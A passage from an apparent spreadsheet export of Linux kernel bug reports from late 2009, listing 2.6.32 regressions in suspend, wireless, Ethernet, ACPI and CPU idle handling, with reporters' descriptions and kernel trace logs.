    <t>Dear all, laptop: sony vaio z11 linux 2.6.32 intel graphics card Debian/unstable up2date xserver-xorg-video-intel 2.9.1-1 xserver-xorg 7.4-4 KMS enabled in the kernel config file I was suspecting a problem with suspend, but that actually works when simply calling s2ram -f. But when I close the lid the screen turns black and when I open the lid again it remains black as the night. I can switch to the console and reboot, but that is suboptimal. I managed to get backlight back by switching to the console, logging in as root, and calling s2ram -f. As far as I see in my log file there was: [ 276.793746] [drm] LVDS-8: set mode 1600x900 d which was when I closed the lid. After opening nothing happened. I switched to console and called s2ram -f which left another [ 304.672948] [drm] LVDS-8: set mode 1600x900 d in the syslog and continued with the normal suspend messages Any idea or suggestions what else I should provide on information? The tests were run with gnome-power-manager *and* acpid killed (not running), so no scripts or whatsoever should interfere. All the best Norbert</t>
  </si>
  <si>
    <t>ath5k fails to connect some times mlme.c:97 cfg80211_send_rx_assoc+0x19f/0x1a4()</t>
  </si>
  <si>
    <t>2.6.32-rc7 rc8</t>
  </si>
  <si>
    <t>2009-12-03 12:33 UTC</t>
  </si>
  <si>
    <t>Hernan G Solari</t>
  </si>
  <si>
    <t>2010-08-13 16:12 UTC</t>
  </si>
  <si>
    <t>I believe this BUG me be the same or related to bug 13943. At least has several features in common. The wifi is working fine with madwifi-hal-0.10.5.6-current. And works with ath5k but I hit this warning some times (see below) and have to retry the connection in such cases. 02:00.0 Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network Adapter (rev 01) Subsystem: AMBIT Microsystem Corp. AR5BXB63 802.11bg NIC Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at d0200000 (64-bit, non-prefetchable) [size=64K] Capabilities: [40] Power Management version 2 Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit- Capabilities: [60] Express Legacy Endpoint, MSI 00 Capabilities: [90] MSI-X: Enable- Count=1 Masked- Capabilities: [100] Advanced Error Reporting Capabilities: [140] Virtual Channel &lt;?&gt; However, madwifi ath_pci driver says: wifi0: Atheros AR2425 chip found (MAC 14.2, PHY SChip 7.0, Radio 10.2) and Vista used to say it was an AR5007. This last too are in agreement as we know. Bug reported. Regresion. Not present in kernel 2.6.30-2 (Debian/squeeze) present in 2.6.32-rc7 and rc8 Dec 2 13:53:04 dinnu kernel: [ 66.636846] WARNING: at net/wireless/mlme.c:97 cfg80211_send_rx_assoc+0x19f/0x1a4() Dec 2 13:53:04 dinnu kernel: [ 66.636850] Hardware name: Aspire 5050 Dec 2 13:53:04 dinnu kernel: [ 66.636852] Modules linked in: radeon ttm drm_kms_helper drm i2c_algo_bit sco bnep rfcomm l2cap crc16 bluetooth powernow_k8 cpufreq_performance cpufreq_powersave cpufreq_ondemand cpufreq_stats freq_table cpufreq_conservative loop snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss uvcvideo videodev snd_mixer_oss v4l1_compat v4l2_compat_ioctl32 serio_raw acer_wmi ac battery pcspkr shpchp wmi snd_pcm ath5k joydev ath evdev k8temp snd_page_alloc ata_generic 8139too pata_acpi sdhci_pci ohci_hcd sdhci 8139cp mmc_core pata_atiixp ehci_hcd usbcore sata_sil thermal fan [last unloaded: scsi_wait_scan] Dec 2 13:53:04 dinnu kernel: [ 66.636907] Pid: 1237, comm: phy0 Tainted: G A 2.6.32-rc8 #2 Dec 2 13:53:04 dinnu kernel: [ 66.636910] Call Trace: Dec 2 13:53:04 dinnu kernel: [ 66.636917] [&lt;ffffffff813fc575&gt;] ? cfg80211_send_rx_assoc+0x19f/0x1a4 Dec 2 13:53:04 dinnu kernel: [ 66.636923] [&lt;ffffffff81044628&gt;] warn_slowpath_common+0x77/0xa4 Dec 2 13:53:04 dinnu kernel: [ 66.636927] [&lt;ffffffff81044664&gt;] warn_slowpath_null+0xf/0x11 Dec 2 13:53:04 dinnu kernel: [ 66.636932] [&lt;ffffffff813fc575&gt;] cfg80211_send_rx_assoc+0x19f/0x1a4 Dec 2 13:53:04 dinnu kernel: [ 66.636938] [&lt;ffffffff8140a30b&gt;] ieee80211_sta_work+0x4e5/0xe86 Dec 2 13:53:04 dinnu kernel: [ 66.636945] [&lt;ffffffff8103e7fb&gt;] ? finish_task_switch+0x3a/0x78 Dec 2 13:53:04 dinnu kernel: [ 66.636952] [&lt;ffffffff81434420&gt;] ? thread_return+0x61/0xc6 Dec 2 13:53:04 dinnu kernel: [ 66.636959] [&lt;ffffffff81058734&gt;] worker_thread+0x18d/0x222 Dec 2 13:53:04 dinnu kernel: [ 66.636963] [&lt;ffffffff81409e26&gt;] ? ieee80211_sta_work+0x0/0xe86 Dec 2 13:53:04 dinnu kernel: [ 66.636968] [&lt;ffffffff8105c0a8&gt;] ? autoremove_wake_function+0x0/0x38 Dec 2 13:53:04 dinnu kernel: [ 66.636973] [&lt;ffffffff810585a7&gt;] ? worker_thread+0x0/0x222 Dec 2 13:53:04 dinnu kernel: [ 66.636977] [&lt;ffffffff8105bd96&gt;] kthread+0x7d/0x85 Dec 2 13:53:04 dinnu kernel: [ 66.636982] [&lt;ffffffff8100ca9a&gt;] child_rip+0xa/0x20 Dec 2 13:53:04 dinnu kernel: [ 66.636986] [&lt;ffffffff8105bd19&gt;] ? kthread+0x0/0x85 Dec 2 13:53:04 dinnu kernel: [ 66.636989] [&lt;ffffffff8100ca90&gt;] ? child_rip+0x0/0x20 Dec 2 13:53:04 dinnu kernel: [ 66.636992] ---[ end trace 3a917509636f79c9 ]--- Dec 2 13:53:04 dinnu kernel: [ 66.637527] ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready Dec 2 13:53:04 dinnu kernel: [ 66.641490] wlan0: deauthenticated from 00:22:6b:5f:12:fd (Reason: 7) Dec 2 13:53:04 dinnu dhclient: Internet Systems Consortium DHCP Client V3.1.3 ----------------------------------- How to produce it: It happens with SOME networks and not always. The network is open (insecure). Happens only at the first attempt to connect. The second attempt is succesful. Using as network manager wicd. Connections made directly with iwconfig and dhclient3 do not trigger the bug.</t>
  </si>
  <si>
    <t>sky2 won't work after suspend/resume cycle</t>
  </si>
  <si>
    <t>2009-12-04 09:02 UTC</t>
  </si>
  <si>
    <t>Maciej J. Woloszyk</t>
  </si>
  <si>
    <t>2010-01-10 22:54 UTC</t>
  </si>
  <si>
    <t>I use sky2 network adapter in my Fujitsu Siemens Esprimo Mobile U9200. It worked fine up until 2.6.31-rc3 (or at least that's the last one I tried it works for me) and in all versions after that I tried it stops working after suspend/resume cycle (I use powersave daemon, but I also tried without it - effect is the same). After resume what I see in dmesg is this: sky2 driver version 1.23 sky2 0000:04:00.0: enabling device (0000 -&gt; 0003) sky2 0000:04:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 sky2 0000:04:00.0: setting latency timer to 64 sky2 0000:04:00.0: unsupported chip type 0xff sky2 0000:04:00.0: PCI INT A disabled sky2: probe of 0000:04:00.0 failed with error -95 So it looks like something is probably not restored correctly after resume or some initializations are not executed. I use Gentoo sources, but I also tried it on vanilla kernels - 2.6.31 and 2.6.32-rc8 and it doesn't work in any version past 2.6.31-rc3.</t>
  </si>
  <si>
    <t>[PATCH]Oops: ACPI: EC: input buffer is not empty, aborting transaction - 2.6.32 regression - Acer_Aspire_5730ZG</t>
  </si>
  <si>
    <t>2009-12-04 14:09 UTC</t>
  </si>
  <si>
    <t>Andrey Ovcharov</t>
  </si>
  <si>
    <t>2013-06-19 08:10 UTC</t>
  </si>
  <si>
    <t>Lan Tianyu</t>
  </si>
  <si>
    <t>42945 48221</t>
  </si>
  <si>
    <t>First of all kernels before 2.6.32 did not observe anything like that. All necessary information about my hardware is here http://ru.gentoo-wiki.com/wiki/Acer_Aspire_5730ZG In sys-kernel/vanilla-sources-2.6.32 and sys-kernel/gentoo-sources-2.6.32 after loading the same symptoms: in the first place is not working brightness control for display; second in dmesg watch spam "ACPI: EC: input buffer is not empty, aborting transaction" "ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.AMW0.WMCA] (Node ffff8800bbc3f3e0), AE_TIME ACPI: EC: input buffer is not empty, aborting transaction ACPI Exception: AE_TIME, Returned by Handler for [EmbeddedControl] (20090903/evregion-424)" the third is markedly reduced performance. the spam in dmesg is very similar to this error http://bugzilla.kernel.org/show_bug.cgi?id=13689 all-info* includes output of /usr/src/linux/scripts/ver_linux; cat /proc/cmdline; cat /proc/cpuinfo; cat /proc/modules; cat /proc/ioports; cat /proc/iomem; lspci -vvv; cat /proc/scsi/scsi The solution was CONFIG_PM_RUNTIME = y</t>
  </si>
  <si>
    <t>Toshiba P305D unhandled ACPI Interrupt</t>
  </si>
  <si>
    <t>2.6.32 - Git</t>
  </si>
  <si>
    <t>2009-12-04 20:39 UTC</t>
  </si>
  <si>
    <t>Kenney Phillis Jr.</t>
  </si>
  <si>
    <t>2010-10-02 02:06 UTC</t>
  </si>
  <si>
    <t>Created attachment 24029 [details] Latest Linux git test results. This is pretty much a continuation of bug 12873. I couldn't reopen the bug, due to how it was closed somehow. This attached file includes the testing results against the latest kernel git. A patch already exists which handles the acpi interrupt, and all that is left is a few fixes to the suspend (some resume bug involving ext4), hibernate ( radeon resume failure). The Quick Results: acpi_osi="Windows 2006" has the irq ignored. acpi_osi="Linux" has the irq working. acpi_osi="!Windows 2006" acpi_osi="!Windows 2006 SP1" has the irq working. s2ram tests with init=/bin/bash show fully working suspend and resume, however, it takes a acpi mode 1 or 3 or for one to post the video card for video to return.</t>
  </si>
  <si>
    <t>2.6.32 new menu idle governor causes very high CPU temp - HP zv5000 (P4/2.66GHz)</t>
  </si>
  <si>
    <t>2009-12-05 17:24 UTC</t>
  </si>
  <si>
    <t>akwatts</t>
  </si>
  <si>
    <t>2010-04-28 20:29 UTC</t>
  </si>
  <si>
    <t>On an HP zv5000 (P4/2.66GHz) laptop running 2.6.32, the symptom is a CPU temp that creeps up continuously until leveling off at 55-57 C (2nd fan keeps it from going beyond that). Using the "nolapic" parameter or reverting the commit below resolves the issue and CPU idle temp returns to 34-35 C. (Note: temperature increase is confirmed at fan exhausts) problem commit (determined through git bisection): ---------- commit 69d25870f20c4b2563304f2b79c5300dd60a067e Author: Arjan van de Ven &lt;arjan@infradead.org&gt; Date: Mon Sep 21 17:04:08 2009 -0700 cpuidle: fix the menu governor to boost IO performance ---------- The kernel is compiled with Local APIC and IO-APIC support for uniprocessors. The .config is based on one used for the 2.6.31.x branch w/o issues. For now, I run 2.6.32 with 69d25870f20c4b2563304f2b79c5300dd60a067e reverted ("nolapic" creates IRQ problems on this HW) and have noticed no problems resulting from this reversion. Please let me know if I can provide any additional information that would be of assistance. ~Andy</t>
  </si>
  <si>
    <t>New rtl8187 rfkill support prevents using wlan completely.</t>
  </si>
  <si>
    <t>2009-12-05 20:10 UTC</t>
  </si>
  <si>
    <t>2009-12-30 16:52 UTC</t>
  </si>
  <si>
    <t>The new rfkill support introduced in rtl8187 driver does not work on my Toshiba Satellite Pro L300 laptop. The driver does not react on the state of the switch, it simply thinks that the kill switch is constantly on. Before the state of the switch was completely ignored and I could use wlan no matter if the switch was on or off.</t>
  </si>
  <si>
    <t>e1000e NIC not working after reboot</t>
  </si>
  <si>
    <t>2.6.36</t>
  </si>
  <si>
    <t>2009-12-06 13:04 UTC</t>
  </si>
  <si>
    <t>Maciek Sitarz</t>
  </si>
  <si>
    <t>2011-06-29 07:54 UTC</t>
  </si>
  <si>
    <t>Tushar</t>
  </si>
  <si>
    <t>When I power up my system the NIC is working properly. After every reboot the NIC is not working. I mean the eth0 is created, but neither dhcpcd gets IP nor static setup helps . ifconfig eth0 shows zero packets on Rx and Tx (no errors, overrunns, etc.) logs after modprobing e1000e (NIC working OK): Dec 6 12:29:28 mcxR kernel: e1000e: Intel(R) PRO/1000 Network Driver - 1.0.2-k2 Dec 6 12:29:28 mcxR kernel: e1000e: Copyright (c) 1999-2008 Intel Corporation. Dec 6 12:29:28 mcxR kernel: e1000e 0000:00:19.0: PCI INT A -&gt; GSI 20 (level, low) -&gt; IRQ 20 Dec 6 12:29:28 mcxR kernel: e1000e 0000:00:19.0: setting latency timer to 64 Dec 6 12:29:28 mcxR kernel: e1000e 0000:00:19.0: irq 30 for MSI/MSI-X Dec 6 12:29:28 mcxR kernel: 0000:00:19.0: eth0: (PCI Express:2.5GB/s:Width x1) 00:15:58:cc:0f:35 Dec 6 12:29:28 mcxR kernel: 0000:00:19.0: eth0: Intel(R) PRO/1000 Network Connection Dec 6 12:29:28 mcxR kernel: 0000:00:19.0: eth0: MAC: 6, PHY: 6, PBA No: ffffff-0ff Dec 6 12:29:28 mcxR kernel: e1000e 0000:00:19.0: irq 30 for MSI/MSI-X Dec 6 12:29:28 mcxR kernel: e1000e 0000:00:19.0: irq 30 for MSI/MSI-X Dec 6 12:29:30 mcxR kernel: e1000e: eth0 NIC Link is Up 100 Mbps Full Duplex, Flow Control: RX/TX logs after rebooting system and modprobing e1000e (NIC not working): Dec 6 11:57:46 mcxR kernel: e1000e: Intel(R) PRO/1000 Network Driver - 1.0.2-k2 Dec 6 11:57:46 mcxR kernel: e1000e: Copyright (c) 1999-2008 Intel Corporation. Dec 6 11:57:46 mcxR kernel: e1000e 0000:00:19.0: PCI INT A -&gt; GSI 20 (level, low) -&gt; IRQ 20 Dec 6 11:57:46 mcxR kernel: e1000e 0000:00:19.0: setting latency timer to 64 Dec 6 11:57:46 mcxR kernel: e1000e 0000:00:19.0: irq 30 for MSI/MSI-X Dec 6 11:57:46 mcxR kernel: 0000:00:19.0: eth0: (PCI Express:2.5GB/s:Width x1) 00:15:58:cc:0f:35 Dec 6 11:57:46 mcxR kernel: 0000:00:19.0: eth0: Intel(R) PRO/1000 Network Connection Dec 6 11:57:46 mcxR kernel: 0000:00:19.0: eth0: MAC: 6, PHY: 6, PBA No: ffffff-0ff Dec 6 11:57:48 mcxR kernel: e1000e 0000:00:19.0: irq 30 for MSI/MSI-X Dec 6 11:57:48 mcxR kernel: e1000e 0000:00:19.0: irq 30 for MSI/MSI-X Additional info: Software: - distro: Arch Linux - kernel version: 2.6.32 - e1000e version: 1.0.2-k2 Hardware: - notebook: Lenovo ThinkPad R61 - network card: Intel Gigabit # lspci -v 00:19.0 Ethernet controller: Intel Corporation 82566MC Gigabit Network Connection (rev 03) Subsystem: Lenovo Device 20ba Flags: bus master, fast devsel, latency 0, IRQ 11 Memory at fe200000 (32-bit, non-prefetchable) [size=128K] Memory at fe224000 (32-bit, non-prefetchable) [size=4K] I/O ports at 1800 [size=32] Capabilities: [c8] Power Management version 2 Capabilities: [d0] MSI: Enable- Count=1/1 Maskable- 64bit+ Kernel modules: e1000e $ uname -a Linux mcxR 2.6.32-ARCH #7 SMP PREEMPT Fri Dec 4 15:39:16 CET 2009 x86_64 Intel(R) Core(TM)2 Duo CPU T7100 @ 1.80GHz GenuineIntel GNU/Linux</t>
  </si>
  <si>
    <t>RT2500 driver: cannot connect to network (regression, bisected)</t>
  </si>
  <si>
    <t>2009-12-06 16:54 UTC</t>
  </si>
  <si>
    <t>rafal</t>
  </si>
  <si>
    <t>2010-12-15 12:20 UTC</t>
  </si>
  <si>
    <t>I have laptop Benq Joybook A33E with network card: rt2500pci : RaLink|RT2500 802.11g Cardbus/mini-PCI [NETWORK_OTHER] (vendor:1814 device:0201 subv:1814 subd:2560) (rev: 01) My network card worked good till 2.6.28. After that version i always have: iwlist wlan0 scan: no scan results Bisection leaded to this commit: e4ea1c403 After this commit, my wireless antena is not initialized anymore - kernel never calls function rt2500pci_config_ant in rt2500pci.c I will attach dirty patch (against mainline) that cause my wireless card works again.</t>
  </si>
  <si>
    <t>ACPI Errors: Index beyond end of object, parse/execution failed, _BCM failed - Asus Notebook X5DIJ-SX101L</t>
  </si>
  <si>
    <t>2009-12-06 18:32 UTC</t>
  </si>
  <si>
    <t>Alexander Haeussler</t>
  </si>
  <si>
    <t>2010-02-06 16:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 24058 [details] dmesg 2.6.32 Most recent kernel where this bug did not occur: 2.6.31.6 stock from Arch Linux Distribution: Arch Linux Hardware Environment: Asus Notebook X5DIJ-SX101L Software Environment: n/a Problem Description: Since installing the new kernel there a many ACPI Errors in dmesg: ACPI Exception: AE_AML_BUFFER_LIMIT, Index (000000064) is beyond end of object (20090903/exoparg2-445) ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.STBR] (Node ffff88007d81d120), AE_AML_BUFFER_LIMIT ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.VGA_.LCDD._BCM] (Node ffff88007d8373a0), AE_AML_BUFFER_LIMIT ACPI Error: Evaluating _BCM failed (20090903/video-528) I didn't notice any problems yet, maybe graphics in X are a bit slower but the biggest problem for me is the spam in dmesg. I found a bugreport (#9558) with ACPI errors that looks similar to mine except the part in square brackets. I have read about using a custom DSDT but the final solution in the other bugreport was a patch for Sizeof operator. Thanks for your support. Steps to reproduce: Install Arch Linux and kernel 2.6.32, type dmesg in a terminal.</t>
  </si>
  <si>
    <t>wireless keeps disconnecting and will not reconnect without reboot.</t>
  </si>
  <si>
    <t>2009-12-07 04:18 UTC</t>
  </si>
  <si>
    <t>Anish Bhatt</t>
  </si>
  <si>
    <t>2009-12-16 08:55 UTC</t>
  </si>
  <si>
    <t>quite frequently, my wireless connection will disconnect and does not reconnect with a reboot. dmesg shows a couple of warnings every time this happens. I haven't found a way to get the wireless up and running without a reboot after this. wlan0 will go down, and iwlist scan will also return no results even if interface is brought up manually. This used to work fine in 2.6.31, but I occassionally saw some warnings. These warnings were not seen in 2.6.30. Wireless connection used to be rock solid before 2.6.32 Hardware : intel 4965 wireless adapter wpa_supplicant version : 0.6.9 Dec 6 19:45:41 cellardoor dhcpcd: wlan0: carrier lost Dec 6 19:45:41 cellardoor avahi-daemon[1175]: Withdrawing address record for fe80::213:e8ff:fe55:4115 on wlan0. Dec 6 19:45:41 cellardoor dhcpcd: sending signal 1 to pid 1365 Dec 6 19:45:41 cellardoor dhcpcd: waiting for pid 1365 to exit Dec 6 19:45:41 cellardoor dhcpcd: received SIGHUP, releasing lease Dec 6 19:45:41 cellardoor dhcpcd: wlan0: removing interface Dec 6 19:45:41 cellardoor kernel: Registered led device: iwl-phy0::radio Dec 6 19:45:41 cellardoor kernel: Registered led device: iwl-phy0::assoc Dec 6 19:45:41 cellardoor kernel: Registered led device: iwl-phy0::RX Dec 6 19:45:41 cellardoor kernel: Registered led device: iwl-phy0::TX Dec 6 19:45:41 cellardoor kernel: ADDRCONF(NETDEV_UP): wlan0: link is not ready Dec 6 19:45:41 cellardoor kernel: ------------[ cut here ]------------ Dec 6 19:45:41 cellardoor kernel: WARNING: at net/mac80211/scan.c:267 ieee80211_scan_completed+0x25d/0x270() Dec 6 19:45:41 cellardoor kernel: Hardware name: HP Pavilion dv6500 Notebook PC Dec 6 19:45:41 cellardoor kernel: Modules linked in: ipv6 joydev fuse btusb bluetooth uvcvideo snd_hda_codec_si3054 snd_hda_codec_realtek snd_seq_dummy snd_hda_intel snd_seq_oss snd_seq_midi_event snd_hda_codec snd_seq snd_seq_device snd_hwdep iTCO_wdt r8169 snd_pcm_oss snd_pcm snd_timer snd_mixer_oss sdhci_pci ohci1394 uhci_hcd ehci_hcd video psmouse sdhci ricoh_mmc ieee1394 snd_page_alloc mii iTCO_vendor_support ac battery intel_agp output snd usbcore serio_raw nvidia(P) evdev ide_cd_mod button thermal coretemp cpufreq_powersave acpi_cpufreq processor rtc_cmos Dec 6 19:45:41 cellardoor kernel: Pid: 1245, comm: wpa_supplicant Tainted: P A 2.6.32-ARCH #3 Dec 6 19:45:41 cellardoor kernel: Call Trace: Dec 6 19:45:41 cellardoor kernel: [&lt;c103953e&gt;] ? warn_slowpath_common+0x6e/0xb0 Dec 6 19:45:41 cellardoor kernel: [&lt;c13aa7ad&gt;] ? ieee80211_scan_completed+0x25d/0x270 Dec 6 19:45:41 cellardoor kernel: [&lt;c1039593&gt;] ? warn_slowpath_null+0x13/0x20 Dec 6 19:45:41 cellardoor kernel: [&lt;c13aa7ad&gt;] ? ieee80211_scan_completed+0x25d/0x270 Dec 6 19:45:41 cellardoor kernel: [&lt;c13b2696&gt;] ? ieee80211_stop+0x526/0x540 Dec 6 19:45:41 cellardoor kernel: [&lt;c1050940&gt;] ? wakeme_after_rcu+0x0/0x10 Dec 6 19:45:41 cellardoor kernel: [&lt;c13dc7f8&gt;] ? _spin_lock_bh+0x8/0x30 Dec 6 19:45:41 cellardoor kernel: [&lt;c132d64e&gt;] ? dev_deactivate+0x15e/0x170 Dec 6 19:45:41 cellardoor kernel: [&lt;c131c6cb&gt;] ? dev_close+0x5b/0xb0 Dec 6 19:45:41 cellardoor kernel: [&lt;c1319b60&gt;] ? dev_set_rx_mode+0x20/0x40 Dec 6 19:45:41 cellardoor kernel: [&lt;c131bfb0&gt;] ? dev_change_flags+0x80/0x1a0 Dec 6 19:45:41 cellardoor kernel: [&lt;c1368e4c&gt;] ? devinet_ioctl+0x6dc/0x770 Dec 6 19:45:41 cellardoor kernel: [&lt;c1318ae5&gt;] ? __dev_get_by_name+0x75/0x90 Dec 6 19:45:41 cellardoor kernel: [&lt;c130ab45&gt;] ? sock_ioctl+0x65/0x260 Dec 6 19:45:41 cellardoor kernel: [&lt;c130aae0&gt;] ? sock_ioctl+0x0/0x260 Dec 6 19:45:41 cellardoor kernel: [&lt;c10de4db&gt;] ? vfs_ioctl+0x1b/0xa0 Dec 6 19:45:41 cellardoor kernel: [&lt;c10de6d9&gt;] ? do_vfs_ioctl+0x79/0x5d0 Dec 6 19:45:41 cellardoor kernel: [&lt;c130c897&gt;] ? sys_send+0x37/0x40 Dec 6 19:45:41 cellardoor kernel: [&lt;c130d5b4&gt;] ? sys_socketcall+0x1d4/0x2a0 Dec 6 19:45:41 cellardoor kernel: [&lt;c10deca6&gt;] ? sys_ioctl+0x76/0x90 Dec 6 19:45:41 cellardoor kernel: [&lt;c1003993&gt;] ? sysenter_do_call+0x12/0x28 Dec 6 19:45:41 cellardoor kernel: ---[ end trace 7b8c9786145ceb8f ]--- Dec 6 19:45:42 cellardoor kernel: ------------[ cut here ]------------ Dec 6 19:45:42 cellardoor kernel: WARNING: at net/wireless/core.c:614 wdev_cleanup_work+0x9f/0xc0() Dec 6 19:45:42 cellardoor kernel: Hardware name: HP Pavilion dv6500 Notebook PC Dec 6 19:45:42 cellardoor kernel: Modules linked in: ipv6 joydev fuse btusb bluetooth uvcvideo snd_hda_codec_si3054 snd_hda_codec_realtek snd_seq_dummy snd_hda_intel snd_seq_oss snd_seq_midi_event snd_hda_codec snd_seq snd_seq_device snd_hwdep iTCO_wdt r8169 snd_pcm_oss snd_pcm snd_timer snd_mixer_oss sdhci_pci ohci1394 uhci_hcd ehci_hcd video psmouse sdhci ricoh_mmc ieee1394 snd_page_alloc mii iTCO_vendor_support ac battery intel_agp output snd usbcore serio_raw nvidia(P) evdev ide_cd_mod button thermal coretemp cpufreq_powersave acpi_cpufreq processor rtc_cmos Dec 6 19:45:42 cellardoor kernel: Pid: 9, comm: events/0 Tainted: P AW 2.6.32-ARCH #3 Dec 6 19:45:42 cellardoor kernel: Call Trace: Dec 6 19:45:42 cellardoor kernel: [&lt;c103953e&gt;] ? warn_slowpath_common+0x6e/0xb0 Dec 6 19:45:42 cellardoor kernel: [&lt;c139175f&gt;] ? wdev_cleanup_work+0x9f/0xc0 Dec 6 19:45:42 cellardoor kernel: [&lt;c13916c0&gt;] ? wdev_cleanup_work+0x0/0xc0 Dec 6 19:45:42 cellardoor kernel: [&lt;c1039593&gt;] ? warn_slowpath_null+0x13/0x20 Dec 6 19:45:42 cellardoor kernel: [&lt;c139175f&gt;] ? wdev_cleanup_work+0x9f/0xc0 Dec 6 19:45:42 cellardoor kernel: [&lt;c104ee7f&gt;] ? worker_thread+0x11f/0x260 Dec 6 19:45:42 cellardoor kernel: [&lt;c1052d40&gt;] ? autoremove_wake_function+0x0/0x40 Dec 6 19:45:42 cellardoor kernel: [&lt;c104ed60&gt;] ? worker_thread+0x0/0x260 Dec 6 19:45:42 cellardoor kernel: [&lt;c1052a94&gt;] ? kthread+0x74/0x80 Dec 6 19:45:42 cellardoor kernel: [&lt;c1052a20&gt;] ? kthread+0x0/0x80 Dec 6 19:45:42 cellardoor kernel: [&lt;c100458f&gt;] ? kernel_thread_helper+0x7/0x18 Dec 6 19:45:42 cellardoor kernel: ---[ end trace 7b8c9786145ceb90 ]--- Dec 6 19:45:44 cellardoor dnsmasq[1148]: reading /etc/resolv.conf Dec 6 19:45:44 cellardoor dnsmasq[1148]: ignoring nameserver 127.0.0.1 - local interface Dec 6 19:46:17 cellardoor dhcpcd: version 5.1.3 starting Dec 6 19:46:17 cellardoor kernel: Registered led device: iwl-phy0::radio Dec 6 19:46:17 cellardoor kernel: Registered led device: iwl-phy0::assoc Dec 6 19:46:17 cellardoor kernel: Registered led device: iwl-phy0::RX Dec 6 19:46:17 cellardoor kernel: Registered led device: iwl-phy0::TX Dec 6 19:46:17 cellardoor kernel: ADDRCONF(NETDEV_UP): wlan0: link is not ready Dec 6 19:46:17 cellardoor dhcpcd: wlan0: waiting for carrier Dec 6 19:46:17 cellardoor kernel: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready Dec 6 19:46:17 cellardoor dnsmasq[1148]: reading /etc/resolv.conf Dec 6 19:46:17 cellardoor dnsmasq[1148]: ignoring nameserver 127.0.0.1 - local interface Dec 6 19:46:19 cellardoor avahi-daemon[1175]: Registering new address record for fe80::213:e8ff:fe55:4115 on wlan0.*. Dec 6 19:51:27 cellardoor kernel: r8169: eth0: link up Dec 6 19:51:27 cellardoor kernel: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready Dec 6 19:51:28 cellardoor avahi-daemon[1175]: Registering new address record for fe80::21b:24ff:fe84:622d on eth0.*. Dec 6 19:51:38 cellardoor kernel: ------------[ cut here ]------------ Dec 6 19:51:38 cellardoor kernel: WARNING: at net/mac80211/scan.c:267 ieee80211_scan_completed+0x25d/0x270() Dec 6 19:51:38 cellardoor kernel: Hardware name: HP Pavilion dv6500 Notebook PC Dec 6 19:51:38 cellardoor kernel: Modules linked in: ipv6 joydev fuse btusb bluetooth uvcvideo snd_hda_codec_si3054 snd_hda_codec_realtek snd_seq_dummy snd_hda_intel snd_seq_oss snd_seq_midi_event snd_hda_codec snd_seq snd_seq_device snd_hwdep iTCO_wdt r8169 snd_pcm_oss snd_pcm snd_timer snd_mixer_oss sdhci_pci ohci1394 uhci_hcd ehci_hcd video psmouse sdhci ricoh_mmc ieee1394 snd_page_alloc mii iTCO_vendor_support ac battery intel_agp output snd usbcore serio_raw nvidia(P) evdev ide_cd_mod button thermal coretemp cpufreq_powersave acpi_cpufreq processor rtc_cmos Dec 6 19:51:38 cellardoor kernel: Pid: 2496, comm: ifconfig Tainted: P AW 2.6.32-ARCH #3 Dec 6 19:51:38 cellardoor kernel: Call Trace: Dec 6 19:51:38 cellardoor kernel: [&lt;c103953e&gt;] ? warn_slowpath_common+0x6e/0xb0 Dec 6 19:51:38 cellardoor kernel: [&lt;c13aa7ad&gt;] ? ieee80211_scan_completed+0x25d/0x270 Dec 6 19:51:38 cellardoor kernel: [&lt;c1039593&gt;] ? warn_slowpath_null+0x13/0x20 Dec 6 19:51:38 cellardoor kernel: [&lt;c13aa7ad&gt;] ? ieee80211_scan_completed+0x25d/0x270 Dec 6 19:51:38 cellardoor kernel: [&lt;c13b2696&gt;] ? ieee80211_stop+0x526/0x540 Dec 6 19:51:38 cellardoor kernel: [&lt;c1050940&gt;] ? wakeme_after_rcu+0x0/0x10 Dec 6 19:51:38 cellardoor kernel: [&lt;c13dc7f8&gt;] ? _spin_lock_bh+0x8/0x30 Dec 6 19:51:38 cellardoor kernel: [&lt;c132d64e&gt;] ? dev_deactivate+0x15e/0x170 Dec 6 19:51:38 cellardoor kernel: [&lt;c131c6cb&gt;] ? dev_close+0x5b/0xb0 Dec 6 19:51:38 cellardoor kernel: [&lt;c1319b60&gt;] ? dev_set_rx_mode+0x20/0x40 Dec 6 19:51:38 cellardoor kernel: [&lt;c131bfb0&gt;] ? dev_change_flags+0x80/0x1a0 Dec 6 19:51:38 cellardoor kernel: [&lt;c1368e4c&gt;] ? devinet_ioctl+0x6dc/0x770 Dec 6 19:51:38 cellardoor kernel: [&lt;c1318ae5&gt;] ? __dev_get_by_name+0x75/0x90 Dec 6 19:51:38 cellardoor kernel: [&lt;c109e378&gt;] ? find_get_page+0x28/0xc0 Dec 6 19:51:38 cellardoor kernel: [&lt;c130ab45&gt;] ? sock_ioctl+0x65/0x260 Dec 6 19:51:38 cellardoor kernel: [&lt;c130aae0&gt;] ? sock_ioctl+0x0/0x260 Dec 6 19:51:38 cellardoor kernel: [&lt;c10de4db&gt;] ? vfs_ioctl+0x1b/0xa0 Dec 6 19:51:38 cellardoor kernel: [&lt;c10de6d9&gt;] ? do_vfs_ioctl+0x79/0x5d0 Dec 6 19:51:38 cellardoor kernel: [&lt;c109ec00&gt;] ? filemap_fault+0x0/0x410 Dec 6 19:51:38 cellardoor kernel: [&lt;c10b74f1&gt;] ? handle_mm_fault+0x101/0x740 Dec 6 19:51:38 cellardoor kernel: [&lt;c10deca6&gt;] ? sys_ioctl+0x76/0x90 Dec 6 19:51:38 cellardoor kernel: [&lt;c1003993&gt;] ? sysenter_do_call+0x12/0x28 Dec 6 19:51:38 cellardoor kernel: ---[ end trace 7b8c9786145ceb91 ]--- Dec 6 19:51:38 cellardoor avahi-daemon[1175]: Withdrawing address record for fe80::213:e8ff:fe55:4115 on wlan0. Dec 6 19:51:38 cellardoor kernel: Registered led device: iwl-phy0::radio Dec 6 19:51:38 cellardoor kernel: Registered led device: iwl-phy0::assoc Dec 6 19:51:38 cellardoor kernel: Registered led device: 